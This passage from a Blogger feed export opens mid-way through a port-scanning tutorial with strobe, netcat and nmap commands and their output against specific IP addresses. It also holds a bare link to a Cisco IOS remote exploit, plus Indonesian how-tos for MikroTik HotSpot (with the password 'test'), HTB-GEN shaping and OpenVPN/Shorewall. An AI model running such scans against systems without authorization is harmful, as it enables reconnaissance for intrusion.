detect both filtered and non-filtered ports on some systems due to anomaly in the way TCP windows size is reported.<br />8.) TCP RPC scan: This technique is specific to UNIX systems and is used to detect and identify Remote Procedure Call (RPC) ports and their associated program and version number.<br />9.) UDP scan: This technique sends a UDP packet to the target port. If the target ports responds with an “ICMP port unreachable” message, the port is closed, if not then the port is open. This is a slow process since UDP is a connectionless protocol, the accuracy of this technique is dependent on many factors related to utilization of network and system resources.<br /><br /><span style="font-style: italic;">We will now discuss some of the more popular and time proven port scanners.<br />Strobe<span style="font-weight: bold;"></span></span><br /><br /><span style="font-weight: bold;">Download it from </span>ftp://ftp.rpmfind.net/linux/redhat/7.1/en/powertools/i386/RedHat/RPMS/strobe-1.04-8.i386.rpm<br /><br />It is one of the fastest and most reliable TCP scanners, it can also grab the associated banner of a particular port. Strobe is a TCP scanner and does not provide UDP scanning capability, as such it can be easily detected by the target machine.<br /><br />[root@ns2 files]# strobe 213.206.75.252<br />strobe 1.04 (c) 1995-1997 Julian Assange (proff@suburbia.net).<br />213.206.75.252 21 ftp File Transfer [Control] [96,JBP]<br />-> 220-FTP server ready.<br />-> 220 Only anonymous FTP is allowed here<br />213.206.75.252 80 http www www-http World Wide Web HTTP<br />www World Wide Web HTTP [TXL]<br />[root@ns2 files]#<br /><br />For a UDP port scanner try udp_scan by SATAN(Security Administrator Tool for Analyzing Networks).<br /><span style="font-weight: bold;"><br />Netcat</span><br /><br />This is known to be called the Swiss army knife in security toolkit. It provides both TCP and UDP scanning capabilities. The -v and -vv options provide verbose output, the -z option is used for port scanning, and the -w2 option provides a timeout value for each connection. By default nc uses TCP ports, the -u option is so used to specify UDP scanning.<br /><br />[root@ns2 files]# nc -v -z -w2 203.122.61.154 1-140<br />ns2.spectra.com [203.122.61.154] 111 (sunrpc) open<br />ns2.spectra.com [203.122.61.154] 80 (http) open<br />ns2.spectra.com [203.122.61.154] 53 (domain) open<br />ns2.spectra.com [203.122.61.154] 23 (telnet) : No route to host<br />[root@ns2 files]#<br /><br />[root@ns2 files]# nc -u -v -z -w2 203.122.61.154 1-140<br />ns2.spectranet.com [203.122.61.154] 132 (?) open<br />ns2.spectranet.com [203.122.61.154] 131 (?) open<br />ns2.spectranet.com [203.122.61.154] 130 (?) open<br />ns2.spectranet.com [203.122.61.154] 129 (?) open<br />ns2.spectranet.com [203.122.61.154] 128 (?) open<br />ns2.spectranet.com [203.122.61.154] 127 (?) open<br />ns2.spectranet.com [203.122.61.154] 126 (?) open<br />punt!<br />[root@ns2 files]#<br /><br /><span style="font-weight: bold;">Network Mapper (nmap)</span><br /><br />Nmap from http://www.insecure.org/nmap is a all in one tool. To see a possible list of options use<br /><br />[root@ns2 files]# nmap –h<br /><br />[root@ns2 files]# nmap -sP 192.168.0.172<br /><br />Starting nmap V. 3.00 ( www.insecure.org/nmap/ )<br />Host ns2.krishna.com (192.168.0.172) appears to be up.<br />Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds<br />[root@ns2 files]#<br /><br />Nmap allows you to enter ranges in CIDR(Classless Inter-Domain Routing) block notation. The –oN will save the output to a human-readable format and use –oM to save it in a tab-delimited file.<br /><br />[root@ns2 files]# nmap –sF 203.122.58.0/24 –oN outfile<br /><span style="font-weight: bold;"><br />Windows based port scanners</span><br /><br />NetScanTools Pro 2000 http://www.nwpsw.com<br />SuperScan http://www.foundstone.com/rdlabs/termsofuse.php?filename=superscan.exe<br />WinScan: http://www.prosolve.com<br />IpEye http://www.ntsecurity.com<br />NetCat http://www.atstake.com/research/tools/nc11nt.zip<br />WUPS http://www.ntsecurity.nu<br />Fscan http://www.foundstone.com/rdlabs/termsofuse.php?filename=fscan.exe<br /><br />Thanks Bro ...<br /><span style="font-style: italic;">Krishna<br />http://www.KrisinDigitalAge.com</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-57238043796126699?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-29098156492083011412008-03-15T11:47:00.001+07:002008-05-13T05:19:13.829+07:00<a href="http://www.secumania.org/exploits/remote/cisco-ios-12_x_11_x-http-remote-integer-overflow-exploit%0D%0A-2003081030210/Label">http://www.secumania.org/exploits/remote/cisco-ios-12_x_11_x-http-remote-integer-overflow-exploit%0D%0A-2003081030210/लेबल</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2909815649208301141?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-7852404710471525572008-03-15T11:46:00.001+07:002008-05-13T05:19:52.029+07:00The MikroTik HotSpot Gateway enables providing of public network access for clients using wireless or wired network connections. HotSpot Gateway should have at least two network interfaces:<br /><br />1. HotSpot interface, which is used to connect HotSpot clients<br /><br />2. LAN/WAN interface, which is used to access network resources.<br /><br />The following picture shows wireless HotSpot setup<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://wiki.mikrotik.com/images/2/2c/Hotspot1.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://wiki.mikrotik.com/images/2/2c/Hotspot1.jpg" alt="" border="0" /></a><br /><br />To setup simple HotSpot Gateway follow the steps below:<br /><br />1. Configure wireless interface on HotSpot Gateway:<br />[admin@HotSpot_Gateway]> interface wireless set wlan1 ssid=HotSpot band=2.4ghz-b \<br />\... mode=ap-bridge<br /><br />2. Configure ip address for HotSpot interface:<br />[admin@HotSpot_Gateway] > ip add add address=192.168.0.1/24 interface=wlan1<br /><br />3. Configure ip address for WAN/LAN interface:<br />[admin@HotSpot_Gateway] > ip add add address=10.5.8.250/24 interface=ether1<br /><br />4. Add a route on HotSpot Gateway<br />[admin@HotSpot_Gateway] > ip route add gateway=10.5.8.1<br /><br />5. Configure Hotspot on wlan1 interface and add user admin with pasword test<br />[admin@MikroTik] > ip hotspot setup<br />hotspot interface: wlan1<br />local address of network: 192.168.0.1/24<br />masquerade network: yes<br />address pool of network: 192.168.0.2-192.168.0.254<br />select certificate: none<br />ip address of smtp server: 0.0.0.0<br />dns servers: 10.5.8.2<br />dns name: hs.example.net<br />name of local hotspot user: admin<br />password for the user: test<br /><br />In order to access network resources HotSpot clients have to configure their wireless interfaces setting proper ssid, band and mode, and enabling dynamic host configuration (dhcp) on the wireless interface.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-785240471047152557?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-57037760834807036012008-03-15T11:45:00.001+07:002008-05-13T05:22:08.049+07:00Diarsipkan di bawah: Mandriva — bayuart - yudha<br /><br />Implementasi bandwidth management biasanya di terapkan pada main-gw (gateway utama) dimana main-gw menghandle beberapa klien yang mempunyai jatah bandwidth yang telah di tetapkan. Disini kita akan menggunakan tool bantu yang bernama HTB-GEN.<br />Pada distro linux kebanyakan sebenarnya htb/cbq sudah include di kernel default masing-masing distro, tinggal kita saja yang kurang familiar dengan perintah tc yang digunakan sebagai standar tool shaping bandwith. Untuk itulah kita menggunakan HTB-GEN disini.<br />Yang perlu diingat adalah :<br />Lisensi GPLv2 or later<br />Syarat dan kebutuhan untuk menjalankannya:<br />-bash<br />-QoS htb kernel support<br />-iproute2 tc<br />-iptables<br />-htb-init script (optional)<br /><br />Ok kita mulai aja meng-implementasikan HTB-GEN ke mesin main-gw kita, langkah-langkahnya adalah sebagai berikut:<br />Langkah 1: Download<br /><br />– htb-gen-0.8.4.tar.gz Source tarball<br />– htb-gen_0.8.4_all.deb Debian package<br />– htb-gen-0.8.4–1.noarch.rpm Aliened RPM package<br /><br />Archive at http://www.praga.org.ar/dev/htb-gen/packages/<br /><br />sesuaikan dengan distro based yang dipakai, disini saya pake mandriva cooker, otomatis harus download yang versi .rpm<br /><br />Langkah 2: Install<br />untuk menginstall htb-gen di mandriva, tinggal menjalankan perintah<br />#urpmi htb-gen-0.8.4-1.noarch.rpm<br /><br />Langkah 3: Konfigurasi<br />setelah langkah instalasi dilalui dengan sukses :) maka akan terdapat file konfigurasi standar htb-gen di direktori /etc/htb-gen.<br />Edit file /etc/htb-gen/htb-gen.conf, dengan editor kesayangan anda :)<br /><br />#vim /etc/htb-gen/htb-gen.conf<br /><br />perhatikan baris berikut ini:<br /><br />iface_down=”eth1″ # Server LAN iface<br />iface_up=”eth0″ # Server INET iface<br />total_rate_down=1024 #Total download bw<br />total_rate_up=512 #Total upload bw<br /><br />Kemudian di file /etc/htb-gen/htb-gen-rates.conf, perhatikan baris berikut :<br /><br /># down down up up<br /># min max min max<br />#ip (rate) (ceil) (rate) (ceil)<br />192.168.1.2 0 64 0 32<br />192.168.1.3 0 128 0 64<br />192.168.1.4 0 256 0 128<br />10.0.0.1/30 256 512 128 256<br />200.80.22.2 256 256 256 256<br /><br />Seperti yang terlihat<br /><br />mudah sekali untuk membatasi suatu host atau network<br /><br />ip beda network juga bisa digunakan<br /><br />penulisan format ip dan network mengikuti aturan standar<br /><br />mendukung fixed rate b/w<br /><br />nilai nol atau “0″ artinya secara otomatis akan menggunakan b/w yang ada atau b/w yang tersisa.<br /><br />Selanjutnya….<br /><br />Langkah 4: Menjalakannya<br /><br />Untuk menjalankan htb-gen sangat mudah, secara umum htb-gen dapat di jalankan dengan opsi sebagai berikut<br /><br />#htb-gen tc_all<br /><br />lebih lanjut dengan opsi htb-gen, bisa di cek dengan perintah<br /><br />#htb-gen –help<br /><br />Situs terkait dan resmi dari htb-gen bisa di cek di http://www.praga.org.ar/wacko/DevPraga/htbgen/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-5703776083480703601?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-35157502048802339822008-03-15T11:44:00.001+07:002008-05-13T05:22:43.985+07:00Sumber linux.or.id<br /><br />Kenapa butuh VPN :<br />Q : Walaupun saya sedang berInternet ria di luar jaringan lokal kantor - saya ingin membuka aplikasi (CRM, ERP) maupun resources lokal. How?<br />A : Hmm, jaringan lokal virtual (VPN) ya?<br /><br />VPN (Virtual Private Network), perpanjangan dari VPN sepertinya mewakili seperti apa fungsinya, adanya jalur khusus (tunnel) untuk mengamankan/mengirimkan data/informasi dengan menggunakan media jaringan atau Internet. Dari perangkat lunak yang gratisan maupun sampai produk yang harganya cukup mahal yang sudah diembedded dengan perangkat keras, seperti Cisco, FortiNet dan lainnya menunjukkan teknologi ini benar-benar sampai sekarang dibutuhkan. Benar ngak sih? Baiklah.<br /><br />OpenVPN salah satu perangkat lunak VPN berlisensi GNU/GPL, yang akan kita gunakan. Pemamfaatan pustaka (library) OpenSSL untuk mengengkripsi data yang ditransfer, dengan kata lain fitur cipher-cipher (SHA1+DES, 3DES, RC4, AES) OpenSSL lainnya bisa dimamfaatkan juga. Ups, silahkan cari info detil ya.<br /><br />Shorewall, salah satu alat bantu untuk mengatur penseleksian keluar masuk paket, menggunakan iptables.<br /><br />2. Instalasi Openvpn<br />Distro linux yang digunakan (CentOS), shorewall, openssl berjalan OK<br /><br />$ sudo yum -y install openssl openvpn<br />{tunggu hingga 100 % komplit}<br /><br />$ cp -r /usr/share/doc/openvpn/easy-rsa /etc/openvpn/<br />$ cd /etc/openvpn/easy-rsa<br />$ vim vars<br />[sunting berkas vars, sesuaikan parameter]<br />export D=`pwd`<br />export KEY_CONFIG=$D/openssl.cnf<br />export KEY=$D/keys<br />export KEY_SIZE=1024<br />export KEY_COUNTRY=ID<br />export KEY_PROVINCE=NS<br />export KEY_CITY=MEDAN<br />export KEY_ORG="Antar Media Network"<br />export KEY_EMAIL="deRegen@antarmedia.net"<br />export KEY_OU="RnD"<br />export KEY_COMMON="vpn.antarmedia.net"<br />--- end of file ---<br /><br />$ source ./vars<br />$ ./build-ca<br />$ ./build-key-server amnet<br />$ ./build-key myclient1<br />$ ./build-key myclient2<br />$ ./build-dh<br /><br />Setelah proses pembeharuan key selesai dilakukan, selanjutnya siapkan berkas konfigurasi yang dibutuhkan.<br /><br />$ vim /etc/openvpn/amnet.conf<br />port 1194<br />dev tun<br />local dev.antarmedia.com<br />proto udp<br />verb 5<br />ca /etc/openvpn/easy-rsa/keys/ca.crt<br />cert /etc/openvpn/easy-rsa/keys/amnet.crt<br />key /etc/openvpn/easy-rsa/keys/amnet.key<br />dh /etc/openvpn/easy-rsa/keys/dh1024.pem<br />server 172.16.1.0 255.255.255.0<br />persist-key<br />persist-tun<br />status /etc/openvpn/openvpn-status.log<br />keepalive 10 120<br />comp-lzo<br />user nobody<br />group nobody<br />max-clients 10<br />cipher AES-128-CBC<br />--- end of file ---<br /><br />$ chown -R nobody:nobody /etc/openvn/<br />$ chwon nobody:nobody /etc/openvpn/openvpn-status.log<br /><br />3. Shorewall Konfigurasi<br />$ vim /etc/shorewall/zones<br />vpn ipv4<br /><br />$ vim /etc/shorewall/rules<br />ACCEPT loc $FW udp 1194<br />ACCEPT net $FW udp 1194<br />ACCEPT vpn loc tcp 25,80,110,3128<br />REDIRECT vpn 3128 tcp www - !172.16.1.0/24<br /><br />$ vim /etc/shorewall/tunnels<br />openvpnserver:1194 net 0.0.0.0/0<br /><br />$ vim /etc/shorewall/masq<br />eth0 tun0 72.232.21.251<br /><br />Catatan:<br />Generate key untuk client sebaiknya dibeda-bedakan, hal ini juga akan menghasilkan pengalokasian ip yang berbeda. Client dapat menggunakan OpenVPN GUI (http://openvpn.se)<br /><br />Berkas konfigurasi OpenVPN pada lingkungan Windows XP Profesional SP 2 diletakkan (C:/Program Files/OpenVPN/config/myclient1.ovpn)<br /><br />client<br />dev tun<br />proto udp<br />remote dev.antarmedia.com 1194<br />resolv-retry infinite<br />nobind<br />persist-key<br />persist-tun<br />pull<br />ca ca.crt<br />cert myclient1.crt<br />key myclient1.key<br />comp-lzo<br />verb4<br />cipher AES-128-CBC<br />--- end of file ---<br /><br />Clients yang terhubung melalui terowongan vpn, tetap bisa mengakses situs dan termonitor dalam berkas squid.log. Openvpn diinstall di mesin yang berfungsi sebagai firewall juga.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3515750204880233982?l=yudhax2.blogspot.com' alt='' /></div>